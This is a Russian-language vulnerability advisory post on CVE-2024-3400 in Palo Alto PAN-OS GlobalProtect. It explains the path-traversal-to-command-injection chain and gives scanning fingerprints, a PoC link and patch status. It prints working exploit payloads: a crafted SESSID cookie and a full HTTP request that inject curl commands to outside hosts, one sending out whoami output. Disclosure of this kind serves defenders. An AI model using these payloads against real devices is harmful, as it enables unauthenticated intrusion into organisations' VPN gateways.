Детали очередной RCE уязвимости CVE-2024-3400 (оценка по CVSS=10.0) максимально высокого уровня критичности были опубликованы на прошлой неделе. На этот раз отличился Palo Alto Networks - один из мировых лидеров в производстве сетевого оборудования. Эксплуатация 0day RCE уязвимости SSLVPN-решения GlobalProtect Gateway/Portal PAN-OS для получения первоначального доступа в рамках вредоносной кампании Operation MidnightEclipse была обнаружена исследователями из Volexity.

Эксплуатация цепочки уязвимостей позволяет удалённому не аутентифицированному злоумышленнику получить RCE:

✅ Уязвимость Arbitrary File Write позволяет писать в директорию с логами телеметрии /opt/panlogs/tmp/device_telemetry/ с помощью Path Traversal в значении Cookie

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}x1.outboundhost.com`;

✅ Уязвимость Command injection в функциональности кастомной библиотеки pansys.py, которая использует curl для отправки телеметрии с устройства по cron, с использованием модуля subprocess.Popen()
✅ Байпас пробелов с помощью IFS (Internal Field Separator)

POST /ssl-vpn/hipreport.esp HTTP/1.1

Host: target.com

Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}attacker.fun?test=$(whoami)`;

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

В России согласно данным Shodan всего 256 хостов пользователей PAN-OS😎, которым необходимо обновиться ASAP

⚙️ POC: https://github.com/0x0d3ad/CVE-2024-3400
🔎 Shodan: http.html_hash:-1303565546
🔎 Censys: services.http.response.body_hash="sha1:28f1cf539f855fff3400f6199f8912908f51e1e1
🔎 Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/b8bbbc5ed5ddbff87fbde649bd2f8a9a576b90c3/http/cves/2024/CVE-2024-3400.yaml
🪲 Уязвимые версии ПО: PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1
✅ Рекомендации: Патчи уже доступны